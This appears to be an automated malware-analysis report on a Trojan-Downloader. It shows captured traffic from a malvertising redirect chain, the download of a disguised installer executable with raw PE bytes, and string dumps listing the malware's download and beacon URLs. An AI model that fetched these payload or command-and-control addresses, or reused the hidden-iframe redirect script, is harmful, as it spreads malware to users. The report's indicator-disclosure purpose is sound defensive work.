ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:06:37 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}..



GET /a/display.php?r=1203893 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.adnetworkperformance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 20 Jun 2016 14:06:04 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-RevProc-1: ca4b836c93e47223f16bb6e2704eddf0 = ok
980..<!DOCTYPE html>.<html>.<head>.    <script la
nguage="javascript">.        if (window.opener) {.            windo
w.opener.focus();.        }.    </script>.</head>.<body
>.<script type="text/javascript">.    ..(function(d) {....var
 advpix68343=d.createElement('iframe');....advpix68343.src='//VVV.adne
tworkperformance.com/pix.html';....advpix68343.frameBorder=0;....advpi
x68343.seamless='seamless';....advpix68343.allowTransparency = 'true';
....advpix68343.setAttribute('style','position:absolute;top:-1000px;le
ft:-1000px;width:1px;height:1px;visibility:hidden;display:none;border:
medium none;background-color:transparent;');.....function appendToBody
() {.....var body=undefined;.....if (typeof d.body != 'undefined') {..
....body = d.body;.....}.....else {......body = d.getElementsByTagName
('body')[0];.....}.....if (!body) {......setTimeout(appendToBody, 10);
.....}.....else {......body.appendChild(advpix68343);.....}....}....ap
pendToBody();...})(document);..    function getMetaContent(name) {.   
     try {.            var meta = window.top.document.getElementsByTag
Name('meta');.            for (var i = 0; i < meta.length; i  ) {. 
               if (meta[i].hasAttribute('name') && meta[i].getAttribut
e('name').toLowerCase() === name) {.                    var info = met
a[i].getAttribute('content');.                    var indexToCut = Mat
h.max(info.indexOf(' ', 256), info.indexOf(',', 256));.               
     if (indexToCut > 384 || indexToCut < 20) {.            
<<< skipped >>>


GET /a/display.php?r=1203893&treqn=863003326&runauction=1&crr=f5829f18bd66e0f9a58a,EmRyUib62556aa2956a48838c36&ctbust=0.12173383931552406&cbtitle=&cbiframe=0&cbdescription=null&cbkeywords=null HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.adnetworkperformance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 20 Jun 2016 14:06:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: acnetwork=c2f260da5767f84c7b4d97bac7; expires=Wed, 30-Dec-2037 23:00:00 GMT; Max-Age=679395236; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
X-Robots-Tag: noindex
Cache-Control: no-store, no-cache, no-transform, must-revalidate, max-age=0, post-check=0, pre-check=0
Pragma: no-cache
X-RevProc-1: b932d130ec013db521bedf9ec6e2637a = ok
Content-Encoding: gzip
568.............Xmo.6......Ce.h.jS.ceX.5........}.$.b"Q4E.v....%;... .
oE.@&u/<><<w.$.yv.b.........Db-J.(.....o...V$.....l.[...{M
.,...<..$DFiWKa.tS)....5W...cF........9f.1.".5.....gxc...x..=.%. ..
....m.....m.....i.b2...`.....;.}.J0.#.'#..!v......;.:.q`......^.g.x`..
.....=.A....r....5........{Q...3.....o_.....Y..s.zx......5..:..PuS....
........Y5-?^^.W...U...r.a9...p}..I..C...4A....dD..T..UHI..GF4.>.."
.......L....Y....~._...o..;.K.............U..5..H,@tZ...C...<.Q{.y.
N....`.s.W..o..U.t......?{./.....I.....B............a...5.....QH..s.X.
J.m...J.4Ix...|.Y.,Z.M(m"../K........L.~e....$L.Kw..n.....P..(!..M.}5.
..*[email protected]...{2.].. .........T..yR.b.#...G.....r.........
............s..t.C..3.Z......p.%Z:....q..:...V..2. .HP...'.....p..-.).
o.c..eE....1*.$...:.*.....L .B....}...U.CZ..r.....iZ..2.....c..$IN....
c....CQMK.....XKi...h.01.u....5-.lQ....w....m..b..._Q.. ....q.Y..B#)..
..}...].....l;.IX..-#...XP....d..f.pEc.6.v...H..B...).V...............
M.......g4..R"....z...r.t%YK...(.v........3...0"..f.....v....O....N..T
,R.....v:.....5.k{... 6"A.$?g$....k[.....=M..Q........,..X7...B.D...iI
p....z..S.8...\`Vr,..6Z.....SU...$..a%I......./....1..".......mY._....
8i.....m.h.{...v'........8'1...Z.8._..b.q[_.c..DA.0....9..x^.A..o..9/U
..pB..H...Q.R..".b..o/..G........Rk......$mNt>)-..fBy....[...{.G../
..}{..K%y\.`..........f[m:u....j..4..{).o.X.{U...y8.......94.....T.Ai5
[email protected]......
<<< skipped >>>

GET /a/display.php?k=5767f84cb4a1512101637.51137939&h=bae4c68faacac27f1f8810fa61cadf9e765a3d52&ban=12101637&iid=1466431564327066441066058003570268&r=1203893&exp=prpd&ci==ov+32bprbe81L+8p7O2gnu73fv5kX6q3e7sx+bvlOO6uXv43jN4p7+93bO5luKszGLt/OLszabt9Wq4yvu5xjN4p7+93bO5lyfvlWcprq/t9W66mHf9iPf6ujN4p7+93bO5lu6t9W64o7e9ifP2gnu73fv5kX6q32bpiL/6mHP2gnu73fv5kXK/9W61luq+32bprbe81L+8p7O2gnu73fv5kX6q3e7sx+bvlOO6uXv43jN4p7+93bO5luqt9Wq4yvu5xjN4p7+93bO5lyfvlScprq/t9W66mHf9iPf6ujN4p7+93bO5lu6t3Obs/2bpjju71L+9YDe6uf/9mTeprebvlKu8rbe8YDe6uf/9mTep83bpdXK/&pm==Uq63Tep&pabt===w6rLf6&pc=l6rv+6rv+6rv+6rvxGbs2Ortpebp&sst=66.231/38.122/0.13/0/5.404&cbiframe=0&id=12101637&iuh==ofpuS8tpO70Cncqnybt1ert1mqspS7pVvMxnOtwJn6p8+7sxmas3K7s3m6tpS7pVvMxnOtwJn6p8Cbtwerspebq1ea1LT8pTLcypeKv2GN1nyrtpK7pTn8p0DP6jnu7QfKv3masnKszUr8p8K+6l7+8mfv6oT+rnebqzi62mv+6u3P6KXavlau8luap/abtpGrvpW7s1m6s+abp9W69uXK/&dmv===g22q6q2qK3&ddv=1&frab=0 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.adnetworkperformance.com
Connection: Keep-Alive
Cookie: acnetwork=c2f260da5767f84c7b4d97bac7


HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Mon, 20 Jun 2016 14:06:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: acnetwork=c2f260da5767f84c7b4d97bac7; expires=Wed, 30-Dec-2037 23:00:00 GMT; Max-Age=679395235; path=/
Location: hXXp://evfomo.ru/6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb1490yo2hx3hhl52youffqvkfkkf?f_sid=1203893
Vary: Accept-Encoding
X-RevProc-1: aab79e3367c3bb0b42f7ce5d6e5336bf = ok
71c..<html>.<head>.    <meta charset="UTF-8">.    &l
t;title></title>.    <link rel="dns-prefetch" href="http:\
/\/evfomo.ru\/6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb149
0yo2hx3hhl52youffqvkfkkf?f_sid=1203893"/>.    <noscript>.    
    <meta id="meta-refresh" http-equiv="refresh" content="0; url=ht
tp:\/\/evfomo.ru\/6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9sh
b1490yo2hx3hhl52youffqvkfkkf?f_sid=1203893">.    </noscript>.
    <style>a {.            color: #fff;.            display: non
e;.            visibility: hidden.        }</style>.    <scri
pt language="javascript">.        if (window.opener) {.            
window.opener.focus();.        }.    </script>.</head>.<
;body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
;.<a id="linker" href="hXXp://VVV.adnetworkperformance.com/ad/visit
.php?al=1">Click here</a>.<script type="text/javascript"&g
t;.                    window.location.replace("http:\/\/evfomo.ru\/6u
snmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb1490yo2hx3hhl52youf
fqvkfkkf?f_sid=1203893");.        ..(function(d) {....var advpix50353=
d.createElement('iframe');....advpix50353.src='//VVV.adnetworkperforma
nce.com/pix.html';....advpix50353.frameBorder=0;....advpix50353.seamle
ss='seamless';....advpix50353.allowTransparency = 'true';....advpix503
53.setAttribute('style','position:absolute;top:-1000px;left:-1000px;wi
dth:1px;height:1px;visibility:hidden;display:none;border:medium no
<<< skipped >>>


GET /YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: bapo.labst.ru
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.2
Date: Mon, 20 Jun 2016 14:06:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 20 Jun 2016 14:06:09 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://itan.etudios.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0
0..HTTP/1.1 302 Moved Temporarily..Server: nginx/1.4.2..Date: Mon, 20 
Jun 2016 14:06:09 GMT..Content-Type: text/html..Transfer-Encoding: chu
nked..Connection: keep-alive..X-Powered-By: PHP/5.4.17..Expires: Mon, 
26 Jul 1997 05:00:00 GMT..Last-Modified: Mon, 20 Jun 2016 14:06:09 GMT
..Cache-Control: no-store, no-cache, must-revalidate..Cache-Control: p
ost-check=0, pre-check=0..Pragma: no-cache..Location: hXXp://itan.etud
ios.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJ
jb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2Z
XIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0..0.
.



GET /download/1/spacesoundpro-installer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.wizzuniquify.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:57 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
5de00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...7.gW.........."...0.................. ........@.. .................
......@[email protected]............
................ .....................................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@[email protected]....... .............
[email protected]........$...............9..X....
........................................0..!.........(.........~.....(
.............*...................&.(......*...0..9........~.........,"
.r...p.....(....o....s............~..... ..*....0...........~..... ..*
".......*.0...........~..... ..*".(.....*Vs....(....t.........*...0..3
........(.......o......s......o......o......o........ ...*".(.....*.0.
.J..............,..r9..ps....z.( .....o!..........,..rg..ps....z......
..%...o"...&*...0..q........ ..... V... 9...o#......r...p.(#...($.....
,....r...p.(#...(....&....X..r...p(%.........-....X.........-.... ...*
....0........... ..... b... E...o#......r...p.(#...($.....,!...r...p.(
#...(&....Y('...(....&....X..r...p(%.........-....X.. ..........-.... 
...*....0............s(.......o).....o*.... ..*.0............( .....(,
....o-...s..... o/....s0...%.o1....%.o2.......(,....o-...o3.....s4....
.....s5.......i.2.............io6.......o.......o.....(7........o8...r
 ..p(9...o:..... ...*.0..~.......r/..p.....ri..p.....r...p.....r..
<<< skipped >>>

The Trojan-Downloader connects to the servers at the folowing location(s):

%original file name%.exe_1756:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp\inetc.dll
/setup_mpck_en.exe
annel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2&errorlevel=0&v=2\"}"}
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp
n/firas/en/setup_mpck_en.exe
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
8!8-8B8I8}8
^2S%S
U.lT/,^wKh
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2A.tmp
nsf2A.tmp
//livestatscounter.com/Generic/vos.php?ch=
c284e5520c58d4087fd8a6f94bb3fb.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2D.tmp
n.php?r=vu_vo2_
dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1938953175.us-east-1.elb.amazonaws.com
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2C.tmp
url=hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2&errorlevel=0
hXXp://dl.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf5.tmp
dlgen.php?r=vu_vo2_
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
4444222

iexplore.exe_552:

%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

idscservice.exe_1920_rwx_00CD0000_00002000:

K.ix%

qnsm13.tmp_2596:

.text
`.rdata
@.data
.reloc
PPSetup.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
operator
GetProcessWindowStation
GetWindowsDirectoryW
KERNEL32.dll
GetProcessHeap
GetCPInfo
zcÁ
4#4*4/4=4
3%3x3
;&;*;1;5;:;
reason=%i&cmd=%s
\StringFileInfo\xx\%s
Field Web Directory
hXXp://mobilitydata5.com/SysInfo/counthu.php?sid=%lld%lld%llu
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=%lld%lld%llu
NSIS_Inetc (Mozilla)
Content-Type: application/x-www-form-urlencoded
ADVAPI32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\qnsm13.tmp

wuauclt.exe_2908:

.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
zcÁ
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module: <failed with %d>
= Process: %s
= Process: <failed with %d>
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
%WinDir%
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System

AutoTime.exe_496:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
r%f;M
4444444
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
src\Path.cpp
0 <= n && n <= _dirs.size()
!_dirs.empty()
d:\sdk\poco-1.5.4\foundation\src\FileStream_WIN32.cpp
d:\sdk\poco-1.5.4\foundation\src\File_WIN32U.cpp
!_path.empty()
src\File.cpp
%<>{}|\"^`
https
bad or invalid port number
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
Property not supported
src\TemporaryFile.cpp
src\BinaryWriter.cpp
Windows 3.x
Windows 95
Windows 98
Windows NT
Windows Vista/Server 2008
Windows 7/Server 2008 R2
Windows 8/Server 2012
Windows 2000
Windows XP
Windows Server 2003/Windows Server 2003 R2
Windows 95/Windows NT 4.0
Windows ME
x:x:x:x:x:x
src\DateTime.cpp
src\Process.cpp
inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)
src\TextConverter.cpp
src\TextIterator.cpp
d:\sdk\poco-1.5.4\foundation\src\bignum.h
d:\sdk\poco-1.5.4\foundation\src\bignum-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\bignum.cc
d:\sdk\poco-1.5.4\foundation\src\fast-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\strtod.cc
d:\sdk\poco-1.5.4\foundation\src\double-conversion.cc
src\NumericString.cpp
cannot create named event %s [Error %d: %s]
anonymous pipe
d:\sdk\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
src\Net.cpp
Network failure while reading HTTP request header
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
HTTP/1.0
HTTP/1.1
Unsupported Media Type
HTTP Version not supported
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
src\SocketAddress.cpp
!hostAndPort.empty()
Missing port number
Invalid address length passed to SocketAddress()
unsupported IP address family
Cannot set the port number for an already connected session
Cannot set the proxy host and port for an already connected session
Cannot set the proxy port number for an already connected session
hXXp://
HTTP Exception
Unsupported HTTP redirect (protocol change)
FTP Exception
SMTP Exception
WebSocket Exception
Unknown or unsupported socket family.
src\MessageHeader.cpp
HttpOnly
; HttpOnly
()[]/|\',;
Invalid or unsupported address family passed to IPAddress()
0.0.0.0
Invalid address length passed to IPAddress()
Invalid prefix length passed to IPAddress()
src\HostEntry.cpp
src\HTTPSession.cpp
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
src\Socket.cpp
Invalid or unsupported address family passed to StreamSocketImpl
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
Not a valid registry key
RegDeleteKeyExW
: type not supported
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
src\NamePool.cpp
src\ParserEngine.cpp
Unexpected parser state - please send a bug report
Requested feature requires XML_DTD support in Expat
!_context.empty()
Unsupported SAX feature or property identifier
src\EntityResolverImpl.cpp
src\Element.cpp
src\XMLFilterImpl.cpp
xml=hXXp://VVV.w3.org/XML/1998/namespace
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
expat_2.1.0
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/2000/xmlns/
0 <= i && i < static_cast<int>(_attributes.size())
src\AttributesImpl.cpp
src\AbstractContainerNode.cpp
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
src\ElementsByTagNameList.cpp
src\AttrMap.cpp
src\DTDMap.cpp
src\ChildNodesList.cpp
hXXp://VVV.w3.org/xmlns/2000/
src\NamespaceSupport.cpp
_contexts.size() > 0
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
MaxPolicyElementKey
pExecutionResource
Unsupported or invalid date/time format
%w, %e %b %r %H:%M:%S %Z
%W, %e %b %r %H:%M:%S %Z
src\MemoryPool.cpp
src\URIStreamOpener.cpp
src\Task.cpp
src\FileStreamFactory.cpp
uri.isRelative() || uri.getScheme() == "file"
src\NotificationCenter.cpp
src\ThreadPool.cpp
cannot allocate thread context key
cannot join thread
src\Thread.cpp
src\ErrorHandler.cpp
YeaLook.lnk
.d
User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
?h=X-X-X-X-X-X&r=%s_%s&t=%s&typeid=%d&status=%d&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s&t=%s&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s&onlinetime=%d --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&InstallState=0
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&DownState=0
?h=X-X-X-X-X-X&r=%s_%s&d=%s&time=%d&first=%d
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&DownState=1
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&InstallState=1
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&Failstate=1
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&DownState=0&PreCheck=1
url=%s
?h=X-X-X-X-X-X&r=%s_%s&hid=%s&geturl=%s&size=%d&ok=%s&isaq=no --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s&hid=%s&geturl=%s&finish=%s --- sdadsada
F:\pz_git\vendor\inc\Poco/String.h
HKEY_USERS\%s\Software\%s
HKEY_CURRENT_USER\Software\%s
HKEY_USERS\%s\Software\%s\appInstall\%s
HKEY_CURRENT_USER\Software\%s\appInstall\%s
HKEY_USERS\%s\Software\%s\appInstall\
